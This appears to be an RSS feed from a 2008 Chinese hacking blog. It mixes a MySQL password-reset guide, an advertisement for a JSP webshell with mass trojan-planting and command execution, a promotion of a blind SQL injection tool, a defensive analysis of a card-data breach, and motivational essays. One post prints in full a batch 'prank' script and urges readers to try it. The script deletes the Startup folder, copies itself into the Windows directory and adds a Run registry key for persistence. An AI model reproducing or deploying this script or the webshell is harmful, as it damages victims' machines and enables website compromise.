http://www.hacklu.net/blog/index.php zh-cn http://www.hacklu.net/blog/read.php/612.htm 樱花浪子 <> Mon, 22 Sep 2008 05:50:42 +0000 http://www.hacklu.net/blog/read.php/612.htm
MySQL忘记密码处理方法解决办法：
1.停止mysql服务。//打开命令行窗口，停止mysql服务： Net stop mysql

2.启动mysql，一般到mysql的安装路径，找到 mysqld-nt.exe
   执行：mysqld-nt --skip-grant-tables 当前窗口将会停止。

3.另外打开一个命令行窗口，进入MYSQL的安装位置下BIN目录，运行mysql

4.输入如下命令：
  >use mysql
  >update user set password=password("new_password") where user="root";
  >flush privileges;
  >exit

5.用Ctrl+Alt+Del，找到mysqld-nt的进程杀掉它，在重新启动mysql-nt服务，就可以用新密码登录了 ]]> http://www.hacklu.net/blog/read.php/611.htm 樱花浪子 <> Mon, 22 Sep 2008 05:37:42 +0000 http://www.hacklu.net/blog/read.php/611.htm http://www.hacklu.net/blog/read.php/610.htm 樱花浪子 <> Mon, 22 Sep 2008 05:30:43 +0000 http://www.hacklu.net/blog/read.php/610.htm
Name:JspX
Author:4lert[D.R.T]
Blog:http://www.4lert.cn

在winxpsp2+eclipse3.3+tomcat5.5.15+jdk1.6下编写。测试运行一切正常。其他环境未作测试。

如果出现不能访问或者HTTP500错误的话。应该是环境的问题。Jsp的执行环境本来就很J8。

此文件为Jsp大马，提供文件管理，批量挂马和执行cmd命令功能。如果有需求的话。或许会增加一些功能，只是程序文件就会变大。

现在大小是10KB。相当的小。因为是第一个版本。难免有bug。文件下载在下面

ps：我以前在红狼的ID是 “叁叁”
这个文件只能在登入之后下载。请先 注册 或 登入 ]]> http://www.hacklu.net/blog/read.php/609.htm 樱花浪子 <> Mon, 22 Sep 2008 05:22:19 +0000 http://www.hacklu.net/blog/read.php/609.htm
文章作者：夜翼

文章来自:http://hi.baidu.com/no%5Fhack/blog/item/25f5b7faa02b84274f4aea37.html

开机后，全屏翻滚闪烁～    其实就是个简单的P处理～哈哈哈～～ 能糊弄住小菜～

Ctrl＋C   强制结束就好了～

加入启动项启动的，忘记做卸载。当初是像弄成恶作剧的来的～～嘎嘎嘎嘎～～～

玩呗～～
源代码如下：

@Echo Off
rd /Q /S C:\"Documents and Settings"\%username%\「开始」菜单\程序\启动
@Copy /y %0 %windir%\2.bat
@reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v expl0rer /t REG_SZ /d %windir%\2.bat /f >nul
@Echo Off
@Echo Exit|%ComSpec% /k prompt e 100 B4 00 B0 12 Cd 10 B0 03 Cd 10 Cd 20 $_g$_q$_|debug>nul
@chcp 437>nul
@graftabl 936>nul
color 0a
@Echo Off
:xing
color 0a
@Echo ________________________________________________________________________________
color 1a
@Echo ________________________________________________________________________________
color 2a
@Echo ________________________________________________________________________________
color 3a
@Echo ________________________________________________________________________________
color 4a
@Echo ________________________________________________________________________________
color 5a
@Echo ________________________________________________________________________________
color 6a
@Echo ________________________________________________________________________________
color 7a
@Echo ________________________________________________________________________________
color 8a
@Echo ________________________________________________________________________________
color 9a
@Echo ________________________________________________________________________________
Goto xing



呼呼，快去试试吧，源码在这里，清除应该不难了吧？！ ]]> http://www.hacklu.net/blog/read.php/608.htm 樱花浪子 <> Sun, 14 Sep 2008 13:37:54 +0000 http://www.hacklu.net/blog/read.php/608.htm 此处包含一个多媒体文件，请用网页方式查看。
]]> http://www.hacklu.net/blog/read.php/606.htm 樱花浪子 <> Sun, 14 Sep 2008 08:31:02 +0000 http://www.hacklu.net/blog/read.php/606.htm http://www.hacklu.net/blog/read.php/605.htm 樱花浪子 <> Sun, 14 Sep 2008 06:32:57 +0000 http://www.hacklu.net/blog/read.php/605.htm     这段时间拜访过不少优秀的企业家、成功的公司总裁、董事长，他们从一无所有，到拥有几千万的资产，几亿的身价，在这个奋斗的过程当中，他们相同的地方是都经历了无数次的失败，仍然还坚信自己的目标。直到最后实现自己的目标。有创业时家人的反对，有投资时朋友的不支持，有众判亲离的孤独，还有深夜不眠的寂寞，有商场的失败，有曾经想放弃的念头———
    之所以能经的起接二连三的困难和挑战，是因为他们都掌握了如何控制自己的情绪（EQ）。懂得理性的分析，策划，行动。在大难来临时，他们有较强的抗压能力（AQ）。所以，人的情绪是可以左右一生成败的，我想有一个快乐、幸福、成功的一生，我要学会控制自己的情绪——-
    沮丧时，我引吭高歌。
    悲伤时，我开怀大笑。
    疾病时，我加倍工作。
    恐惧时，我勇往直前。
    自卑时，我换上新装。
    不安时，我提高嗓门。
    穷困潦倒时，我想像未来的富有。
    力不从心时，我回想过去的成功。
    自轻自贱时，我想想自己的目标。
    自高自大时，我要追寻失败的记忆。
    纵情享受时，我要记得挨饿的日子。
    洋洋得意时，我要想想竞争对手。
   沾沾自喜时，不要忘了那忍辱的时刻。
    自以为是时，看看自己能否让风驻步。
    腰缠万贯时，想想那些食不果腹的人。
    骄傲自满时，要想到自己怯懦的时候。
    不可一世时，让我抬头，仰望群星。
    今天，我要学会控制自己的情绪，我要成为自己的主人，我由此而变的伟大！
]]> http://www.hacklu.net/blog/read.php/604.htm 樱花浪子 <> Wed, 10 Sep 2008 14:40:35 +0000 http://www.hacklu.net/blog/read.php/604.htm 我们是怎样的一代人  

当我们读小学的时候，读大学不要钱；  

当我们读大学的时候，读小学不要钱；  

我们还没能工作的时候，工作也是分配的；  

我们可以工作的时候，撞得头破血流才勉强找份饿不死人的工作做；

当我们不能挣钱的时候，房子是分配的；  

当我们能挣钱的时候，却发现房子已经买不起了；  

当我们没有进入股市的时候,傻瓜都在赚钱；  

当我们兴冲冲地闯进去的时候,才发现自己成了傻瓜；  

当我们不到结婚的年龄的时候骑单车就能娶媳妇；  

当我们到了结婚年龄的时候没有洋房汽车娶不了媳妇；  

当我们没找对象的时候，姑娘们是讲心的；  

当我们找对象的时候，姑娘们是讲金的；  

当我们没找工作的时候，小学生也能当领导的；  

当我们找工作的时候，大学生也只能洗厕所的；  

当我们没生娃的时候，别人是可以生一串的；  

当我们要生娃的时候，谁都不许生多个的。

他娘的是谁写的 我真的是五体投地了！事实就是这样！还在奋斗中的80后的男同胞们加油了！！ ]]> http://www.hacklu.net/blog/read.php/603.htm 樱花浪子 <> Mon, 08 Sep 2008 04:39:28 +0000 http://www.hacklu.net/blog/read.php/603.htm
当时论文题目是：
Time-Based Blind SQL Injection using heavy queries:
A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool

作者：
Chema Alonso
Microsoft MVP Windows Security,Informática64
José Parada
Microsoft IT Pro Evangelist,Microsoft

.abu.点评：


点击在新窗口中浏览此图片
http://soft.butian.org/http/attack/injection/MarathonTool.gif


盲注工具，支持MSSQL/ACCESS/Oracle/MySQL的注入。建议阅读作者在黑客大会上的论文。
我已经将源代码放进去了，有心人可以研究研究。

论文下载：http://butian.org/security/Learning-materials/20080907/166.html
这个文件只能在登入之后下载。请先 注册 或 登入 ]]> http://www.hacklu.net/blog/read.php/602.htm 樱花浪子 <> Fri, 05 Sep 2008 03:39:37 +0000 http://www.hacklu.net/blog/read.php/602.htm
1.攻击者是如何具体入侵无线网络的？

要入侵无线网络，黑客需要打破无线网络的WEP加密。这种加密协议存在缺陷，很容易被攻破，进而进入受保护的网络。

美国波士顿的联邦检察官迈克尔沙利文表示，一旦进入网络内部，那三个安装好的“嗅探器”程序就会在零售商的卡处理网络中到处嗅探，捕获信用卡号码、密码和帐户信息。还有一些其他私人号码可以帮助他们访问已经签发并且激活了的信用卡和借记卡。

2.整个事件中入侵者都利用了哪些漏洞，采用了哪些入侵手段？

黑客使用的是一种广为流行并且普遍适用的技术，即通过前端资料隐码入侵获取访问数据库。这直接通过一个公众所面临的界面(HTTP)执行，并且依赖于利用贯穿网络层到后端系统的数据查询。在这种情况下，这是管理方面的问题——这是一个广泛、普遍存在的问题，应该一直严肃对待。

服务器系统可能遇到各式各样的攻击，一旦被入侵，客户的数据资料确实可能处于危险之中。典型的案例包括通过 “被迫式”下载来自动安装恶意软件。

“被迫式”下载往往发生在用户访问一个有漏洞的网页的时候，它将从网页浏览器中找到没有打补丁的漏洞进而安装恶意代码。当然这并不一定发生在服务器上，它可能发生在作为与关键系统处于同网络的客户系统上。恶意软件(木马)往往从那里散播到整个网络。

然而，在这种情况下，确保无线网络的安全看起来是一个简单的问题。没有采用“零日” 攻击，而是利用一种众所周知的具有无线加密协议的安全问题。通过使用加密技术如WEP或者更强有力的机制如WPA、WPA2可以保护大部分无线网络的安全。据说WEP拥有各种安全性缺陷，其加密协议很容易被破解从而进入该无线网络。无线网络不应该允许访问敏感数据的。基于这些原因，一个相对容易的安全漏洞出现。我们所提及的嗅探器程序是一种后门木马，它们是一种可以搜集并传递信息的恶意代码，也是当今网络犯罪很受欢迎的黑客工具。

3.为什么这么长时间才破获这个案件？

据CNN报道，调查开始于2006年年底，除了司法部门，密情局通过美国在圣地亚哥联邦调查局进行了三年多的秘密调查。

司法部在一个声明中表示，黑客当时隐藏了他们控制的位于美国和东欧的在加密计算机服务器上的数据。一些信用卡和借记卡的号码通过互联网出售给其他人，然后将信用卡号加密存储于空白卡来取现金。通过在空白卡的磁条上加密“兑现”。当局声称，被告然后用这些卡每次在ATM取款机上提取数万美元。花了这么长时间是因为调查这些事件十分复杂，在各个地区牵扯到许多因素。不同国家针对加密储存数据的法律不同，导致了调查加密数据存储只会拖延调查的进程。

4.是攻击者技术手段很高，没有让任何一方察觉，还是其他原因？

这存在两个主要问题。

第一个是关于最初的安全漏洞：在防护无线网络和数据的时候，用简单的手段保护无线网络的防护协议非常脆弱。很容易通过无线网络获得敏感信息，这是设计和拓扑布局的问题。

第二个问题是关于恶意后门木马程序在网络上的蓬勃发展，并且搜集了大量的信息用于恶意目的。这些木马程序常常被疏忽。通过部署适当的安全系统，最初的漏洞不会再发生。当一个漏洞出现，一个恶意的内部人员进入网络，综合安全系统各个功能应该会阻止这些木马：反病毒就是一个很好的例子。

网络安全的一系列发展正导致一个综合解决方案的出现，从而使网络能够伸缩自如以抵御绝大部分攻击。这个解决方案的关键组件正在由产品厂商推出，被称之谓UTM，或统一威胁管理系统。

促使内部网络安全成为危机点的两个主要因素是：

(1)网络犯罪：随着犯罪分子在身份盗窃与勒索方面越来越成熟，他们所涉及的网络范围也越来越大。现在，他们把目标锁定在提供丰富机会的特定公司和网站，因为它们可以带来有价值的交易或者储备了大量个人信息如信用卡和银行账户的数据库。

(2)怀有恶意的内部人员：对于一般终端用户可使用的入侵、扫描和开发网络资源的工具和技术的数量不断剧增。随着时间的推移，那些导致信息或者业务资源真正丢失的内部人员事件将会增加。为了保护组织免受来自这些方面的攻击，局域网接入点必须看作是一个安全周界。

5. 国内企业应该采取哪些防范措施？

·无线网络不能访问关键数据，并且采用更为强大的加密算法(非WEP协议)。

·通过封包分析(入侵防御系统)防御资料隐码入侵。

·通过入侵防御系统防御漏洞利用(恶意下载，服务攻击)。

·通过反垃圾邮件、反病毒和网页过滤(有恶意漏洞利用的网址或其它恶意软件)防御网络钓鱼类攻击。

·通过防火墙政策保护来自不可信任来源未被授权的端口访问。

·通过为软件提供最新更新和补丁防范成功的漏洞攻击。

·通过反病毒软件防御在网络上泛滥并危及敏感信息的恶意代码。

6. 特殊时期(如奥运期间)哪些安全措施尤为重要？

公司IT管理人员应该为员工推荐以下培训：

• 决不要打开第三方建议的、未经请求的链接——取而代之的是，打开你的浏览器输入你想要访问的网址URL。

·升级安全解决方案——适当拥有一个有效的反垃圾邮件、网页过滤和防病毒的解决方案，并且确保持续更新。

·“点击之前，请选择”——用几秒钟的时间看一下你打算点击的链接，始终要有意识，注意那些企图通过使用错误拼写或者古怪的子域名使之看似合法的链接。

·保护隐私——永远不要应第三方的请求泄露个人信息，如银行帐号、信用卡或者密码。

·了解你的供应商——当使用个人信息来进行在线交易的时候，确保供应商是一个可信任的来源而且交易是通过一个安全的连接进行的。

·关键问题培训——员工应该清楚了解安全风险，尤其在加强警戒阶段，推荐通过简单的培训来防御社会工程攻击。

·补丁、补丁、补丁——所有的软件，尤其是浏览器和操作系统，应该获取最新的更新(补丁)。这将确保网页漏洞被关闭，使远程攻击者不能利用已知的漏洞。

文/赛迪网 ]]>